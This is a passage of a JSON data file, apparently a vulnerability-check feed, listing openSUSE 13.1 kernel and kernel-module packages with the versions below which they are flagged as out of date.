"lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "i686", "packageFilename": "kernel-trace-devel-3.11.10-25.1.i686.rpm", "packageName": "kernel-trace-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "x86_64", "packageFilename": "kernel-debug-devel-3.11.10-25.1.x86_64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "i686", "packageFilename": "kernel-ec2-3.11.10-25.1.i686.rpm", "packageName": "kernel-ec2", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "x86_64", "packageFilename": "kernel-vanilla-debugsource-3.11.10-25.1.x86_64.rpm", "packageName": "kernel-vanilla-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.28_k3.11.10_25-16.16.1", "arch": "i586", "packageFilename": "hdjmod-kmp-xen-1.28_k3.11.10_25-16.16.1.i586.rpm", "packageName": "hdjmod-kmp-xen", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "i686", "packageFilename": "kernel-desktop-debugsource-3.11.10-25.1.i686.rpm", "packageName": "kernel-desktop-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.58-16.1", "arch": "x86_64", "packageFilename": "ndiswrapper-debugsource-1.58-16.1.x86_64.rpm", "packageName": "ndiswrapper-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "noarch", "packageFilename": "kernel-source-vanilla-3.11.10-25.1.noarch.rpm", "packageName": "kernel-source-vanilla", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "i586", "packageFilename": "kernel-default-devel-debuginfo-3.11.10-25.1.i586.rpm", "packageName": "kernel-default-devel-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.4.20.3-13.16.1", "arch": "x86_64", "packageFilename": "iscsitarget-1.4.20.3-13.16.1.x86_64.rpm", "packageName": "iscsitarget", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "2.3_k3.11.10_25-2.16.1", "arch": "i586", "packageFilename": "xtables-addons-kmp-default-debuginfo-2.3_k3.11.10_25-2.16.1.i586.rpm", "packageName": "xtables-addons-kmp-default-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.2.18_k3.11.10_25-2.21.1", "arch": "i586", "packageFilename": "virtualbox-host-kmp-default-4.2.18_k3.11.10_25-2.21.1.i586.rpm", "packageName": "virtualbox-host-kmp-default", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.4.20.3_k3.11.10_25-13.16.1", "arch": "i586", "packageFilename": "iscsitarget-kmp-xen-debuginfo-1.4.20.3_k3.11.10_25-13.16.1.i586.rpm", "packageName": "iscsitarget-kmp-xen-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "6.21.1_k3.11.10_25-2.20.1", "arch": "i586", "packageFilename": "ipset-kmp-pae-debuginfo-6.21.1_k3.11.10_25-2.20.1.i586.rpm", "packageName": "ipset-kmp-pae-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.3.2_02_k3.11.10_25-30.1", "arch": "i586", "packageFilename": "xen-kmp-desktop-4.3.2_02_k3.11.10_25-30.1.i586.rpm", "packageName": "xen-kmp-desktop", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.28_k3.11.10_25-16.16.1", "arch": "i586", "packageFilename": "hdjmod-kmp-desktop-1.28_k3.11.10_25-16.16.1.i586.rpm", "packageName": "hdjmod-kmp-desktop", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.3.2_02_k3.11.10_25-30.1", "arch": "i586", "packageFilename": "xen-kmp-pae-4.3.2_02_k3.11.10_25-30.1.i586.rpm", "packageName": "xen-kmp-pae", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "6.21.1_k3.11.10_25-2.20.1", "arch": "x86_64", "packageFilename": "ipset-kmp-default-debuginfo-6.21.1_k3.11.10_25-2.20.1.x86_64.rpm", "packageName": "ipset-kmp-default-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.2.18_k3.11.10_25-2.21.1", "arch": "x86_64", "packageFilename": "virtualbox-host-kmp-default-debuginfo-4.2.18_k3.11.10_25-2.21.1.x86_64.rpm", "packageName": "virtualbox-host-kmp-default-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "x86_64", "packageFilename": "kernel-vanilla-debuginfo-3.11.10-25.1.x86_64.rpm", "packageName": "kernel-vanilla-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "x86_64", "packageFilename": "kernel-xen-devel-debuginfo-3.11.10-25.1.x86_64.rpm", "packageName": "kernel-xen-devel-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "x86_64", "packageFilename": "kernel-trace-base-debuginfo-3.11.10-25.1.x86_64.rpm", "packageName": "kernel-trace-base-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "20130607_k3.11.10_25-2.17.1", "arch": "x86_64", "packageFilename": "vhba-kmp-desktop-20130607_k3.11.10_25-2.17.1.x86_64.rpm", "packageName": "vhba-kmp-desktop", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.2.18-2.21.1", "arch": "x86_64", "packageFilename": "virtualbox-websrv-4.2.18-2.21.1.x86_64.rpm", "packageName": "virtualbox-websrv", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "x86_64", "packageFilename": "kernel-syms-3.11.10-25.1.x86_64.rpm", "packageName": "kernel-syms", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "2.639-11.16.1", "arch": "i586", "packageFilename": "cloop-debugsource-2.639-11.16.1.i586.rpm", "packageName": "cloop-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.58_k3.11.10_25-16.1", "arch": "x86_64", "packageFilename": "ndiswrapper-kmp-default-debuginfo-1.58_k3.11.10_25-16.1.x86_64.rpm", "packageName": "ndiswrapper-kmp-default-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "0.44_k3.11.10_25-258.16.1", "arch": "i586", "packageFilename": "pcfclock-kmp-default-0.44_k3.11.10_25-258.16.1.i586.rpm", "packageName": "pcfclock-kmp-default", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "2.3-2.16.1", "arch": "i586", "packageFilename": "xtables-addons-debugsource-2.3-2.16.1.i586.rpm", "packageName": "xtables-addons-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "i686", "packageFilename": "kernel-trace-3.11.10-25.1.i686.rpm", "packageName": "kernel-trace", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "i686", "packageFilename": "kernel-xen-devel-3.11.10-25.1.i686.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "i686", "packageFilename": "kernel-xen-debuginfo-3.11.10-25.1.i686.rpm", "packageName": "kernel-xen-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "7.0.2-2.16.1", "arch": "i586", "packageFilename": "crash-doc-7.0.2-2.16.1.i586.rpm", "packageName": "crash-doc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.2.18_k3.11.10_25-2.21.1", "arch": "i586", "packageFilename": "virtualbox-guest-kmp-pae-4.2.18_k3.11.10_25-2.21.1.i586.rpm", "packageName": "virtualbox-guest-kmp-pae", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "0.44_k3.11.10_25-258.16.1", "arch": "i586", "packageFilename": "pcfclock-kmp-pae-debuginfo-0.44_k3.11.10_25-258.16.1.i586.rpm", "packageName": "pcfclock-kmp-pae-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.58_k3.11.10_25-16.1", "arch": "x86_64", "packageFilename": "ndiswrapper-kmp-default-1.58_k3.11.10_25-16.1.x86_64.rpm", "packageName": "ndiswrapper-kmp-default", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "7.0.2_k3.11.10_25-2.16.1", "arch": "i586", "packageFilename": "crash-kmp-pae-debuginfo-7.0.2_k3.11.10_25-2.16.1.i586.rpm", "packageName": "crash-kmp-pae-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.2.18-2.21.1", "arch": "x86_64", "packageFilename": "virtualbox-websrv-debuginfo-4.2.18-2.21.1.x86_64.rpm", "packageName": "virtualbox-websrv-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "x86_64", "packageFilename": "kernel-desktop-base-3.11.10-25.1.x86_64.rpm", "packageName": "kernel-desktop-base", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "7.0.2-2.16.1", "arch": "i586", "packageFilename": "crash-gcore-debuginfo-7.0.2-2.16.1.i586.rpm", "packageName": "crash-gcore-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "2.639_k3.11.10_25-11.16.1", "arch": "i586", "packageFilename": "cloop-kmp-xen-2.639_k3.11.10_25-11.16.1.i586.rpm", "packageName": "cloop-kmp-xen", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.2.18_k3.11.10_25-2.21.1", "arch": "i586", "packageFilename": "virtualbox-host-kmp-default-debuginfo-4.2.18_k3.11.10_25-2.21.1.i586.rpm", "packageName": "virtualbox-host-kmp-default-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.4.20.3-13.16.1", "arch": "x86_64", "packageFilename": "iscsitarget-debuginfo-1.4.20.3-13.16.1.x86_64.rpm", "packageName": "iscsitarget-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "i686", "packageFilename": "kernel-xen-3.11.10-25.1.i686.rpm", "packageName": "kernel-xen", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.2.18_k3.11.10_25-2.21.1", "arch": "i586", "packageFilename": "virtualbox-guest-kmp-default-4.2.18_k3.11.10_25-2.21.1.i586.rpm", "packageName": "virtualbox-guest-kmp-default", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "i586", "packageFilename": "kernel-default-debugsource-3.11.10-25.1.i586.rpm", "packageName": "kernel-default-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "i686", "packageFilename": "kernel-desktop-debuginfo-3.11.10-25.1.i686.rpm", "packageName": "kernel-desktop-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "i686", "packageFilename": "kernel-desktop-devel-debuginfo-3.11.10-25.1.i686.rpm", "packageName": "kernel-desktop-devel-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "i586", "packageFilename": "kernel-default-devel-3.11.10-25.1.i586.rpm", "packageName": "kernel-default-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "0.44_k3.11.10_25-258.16.1", "arch": "x86_64", "packageFilename": "pcfclock-kmp-default-0.44_k3.11.10_25-258.16.1.x86_64.rpm", "packageName": "pcfclock-kmp-default", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "x86_64", "packageFilename": "kernel-trace-base-3.11.10-25.1.x86_64.rpm", "packageName": "kernel-trace-base", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "0.44_k3.11.10_25-258.16.1", "arch": "i586", "packageFilename": "pcfclock-kmp-pae-0.44_k3.11.10_25-258.16.1.i586.rpm", "packageName": "pcfclock-kmp-pae", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.2.18-2.21.1", "arch": "x86_64", "packageFilename": "python-virtualbox-debuginfo-4.2.18-2.21.1.x86_64.rpm", "packageName": "python-virtualbox-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "7.0.2_k3.11.10_25-2.16.1", "arch": "i586", "packageFilename": "crash-kmp-pae-7.0.2_k3.11.10_25-2.16.1.i586.rpm", "packageName": "crash-kmp-pae", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "7.0.2-2.16.1", "arch": "x86_64", "packageFilename": "crash-debugsource-7.0.2-2.16.1.x86_64.rpm", "packageName": "crash-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "i686", "packageFilename": "kernel-desktop-base-debuginfo-3.11.10-25.1.i686.rpm", "packageName": "kernel-desktop-base-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "x86_64", "packageFilename": "kernel-xen-3.11.10-25.1.x86_64.rpm", "packageName": "kernel-xen", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "x86_64", "packageFilename": "kernel-xen-devel-3.11.10-25.1.x86_64.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.2.18-2.21.1", "arch": "i586", "packageFilename": "virtualbox-guest-x11-debuginfo-4.2.18-2.21.1.i586.rpm", "packageName": "virtualbox-guest-x11-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "2.639_k3.11.10_25-11.16.1", "arch": "i586", "packageFilename": "cloop-kmp-pae-debuginfo-2.639_k3.11.10_25-11.16.1.i586.rpm", "packageName": "cloop-kmp-pae-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "6.21.1-2.20.1", "arch": "i586", "packageFilename": "libipset3-debuginfo-6.21.1-2.20.1.i586.rpm", "packageName": "libipset3-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "2.3-2.16.1", "arch": "i586", "packageFilename": "xtables-addons-debuginfo-2.3-2.16.1.i586.rpm", "packageName": "xtables-addons-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "2.639_k3.11.10_25-11.16.1", "arch": "x86_64", "packageFilename": "cloop-kmp-default-2.639_k3.11.10_25-11.16.1.x86_64.rpm", "packageName": "cloop-kmp-default", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "i686", "packageFilename": "kernel-debug-devel-3.11.10-25.1.i686.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "0.44-258.16.1", "arch": "x86_64", "packageFilename": "pcfclock-debuginfo-0.44-258.16.1.x86_64.rpm", "packageName": "pcfclock-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.2.18-2.21.1", "arch": "i586", "packageFilename": "virtualbox-websrv-4.2.18-2.21.1.i586.rpm", "packageName": "virtualbox-websrv", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.2.18-2.21.1", "arch": "x86_64", "packageFilename": "virtualbox-guest-tools-4.2.18-2.21.1.x86_64.rpm", "packageName": "virtualbox-guest-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "2.3_k3.11.10_25-2.16.1", "arch": "x86_64", "packageFilename": "xtables-addons-kmp-default-debuginfo-2.3_k3.11.10_25-2.16.1.x86_64.rpm", "packageName": "xtables-addons-kmp-default-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "2.639_k3.11.10_25-11.16.1", "arch": "i586", "packageFilename": "cloop-kmp-desktop-2.639_k3.11.10_25-11.16.1.i586.rpm", "packageName": "cloop-kmp-desktop", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "2.639_k3.11.10_25-11.16.1", "arch": "i586", "packageFilename": "cloop-kmp-xen-debuginfo-2.639_k3.11.10_25-11.16.1.i586.rpm", "packageName": "cloop-kmp-xen-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "i686", "packageFilename": "kernel-xen-devel-debuginfo-3.11.10-25.1.i686.rpm", "packageName": "kernel-xen-devel-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.3.2_02-30.1", "arch": "i586", "packageFilename": "xen-libs-debuginfo-4.3.2_02-30.1.i586.rpm", "packageName": "xen-libs-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "i686", "packageFilename": "kernel-trace-debuginfo-3.11.10-25.1.i686.rpm", "packageName": "kernel-trace-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "7.0.2-2.16.1", "arch": "x86_64", "packageFilename": "crash-debuginfo-7.0.2-2.16.1.x86_64.rpm", "packageName": "crash-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "6.21.1_k3.11.10_25-2.20.1", "arch": "i586", "packageFilename": "ipset-kmp-desktop-6.21.1_k3.11.10_25-2.20.1.i586.rpm", "packageName": "ipset-kmp-desktop", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "6.21.1_k3.11.10_25-2.20.1", "arch": "x86_64", "packageFilename": "ipset-kmp-default-6.21.1_k3.11.10_25-2.20.1.x86_64.rpm", "packageName": "ipset-kmp-default", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "6.21.1_k3.11.10_25-2.20.1", "arch": "x86_64", "packageFilename": "ipset-kmp-desktop-6.21.1_k3.11.10_25-2.20.1.x86_64.rpm", "packageName": "ipset-kmp-desktop", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.2.18_k3.11.10_25-2.21.1", "arch": "i586", "packageFilename": "virtualbox-guest-kmp-default-debuginfo-4.2.18_k3.11.10_25-2.21.1.i586.rpm", "packageName": "virtualbox-guest-kmp-default-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.3.2_02_k3.11.10_25-30.1", "arch": "x86_64", "packageFilename": "xen-kmp-desktop-debuginfo-4.3.2_02_k3.11.10_25-30.1.x86_64.rpm", "packageName": "xen-kmp-desktop-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "0.44_k3.11.10_25-258.16.1", "arch": "i586", "packageFilename": "pcfclock-kmp-desktop-debuginfo-0.44_k3.11.10_25-258.16.1.i586.rpm", "packageName": "pcfclock-kmp-desktop-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.3.2_02-30.1", "arch": "x86_64", "packageFilename": "xen-tools-4.3.2_02-30.1.x86_64.rpm", "packageName": "xen-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "2.639_k3.11.10_25-11.16.1", "arch": "x86_64", "packageFilename": "cloop-kmp-desktop-debuginfo-2.639_k3.11.10_25-11.16.1.x86_64.rpm", "packageName": "cloop-kmp-desktop-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "2.639-11.16.1", "arch": "x86_64", "packageFilename": "cloop-debugsource-2.639-11.16.1.x86_64.rpm", "packageName": "cloop-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.58_k3.11.10_25-16.1", "arch": "i586", "packageFilename": "ndiswrapper-kmp-desktop-debuginfo-1.58_k3.11.10_25-16.1.i586.rpm", "packageName": "ndiswrapper-kmp-desktop-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.3.2_02-30.1", "arch": "x86_64", "packageFilename": "xen-libs-debuginfo-4.3.2_02-30.1.x86_64.rpm", "packageName": "xen-libs-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.2.18-2.21.1", "arch": "i586", "packageFilename": "virtualbox-guest-x11-4.2.18-2.21.1.i586.rpm", "packageName": "virtualbox-guest-x11", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "2.639-11.16.1", "arch": "i586", "packageFilename": "cloop-2.639-11.16.1.i586.rpm", "packageName": "cloop", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "20130607_k3.11.10_25-2.17.1", "arch": "i586", "packageFilename": "vhba-kmp-desktop-20130607_k3.11.10_25-2.17.1.i586.rpm", "packageName": "vhba-kmp-desktop", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "2.639_k3.11.10_25-11.16.1", "arch": "x86_64", "packageFilename": "cloop-kmp-xen-2.639_k3.11.10_25-11.16.1.x86_64.rpm", "packageName": "cloop-kmp-xen", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.3.2_02-30.1", "arch": "x86_64", "packageFilename": "xen-tools-domU-debuginfo-4.3.2_02-30.1.x86_64.rpm", "packageName": "xen-tools-domU-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "2.3_k3.11.10_25-2.16.1", "arch": "i586", "packageFi
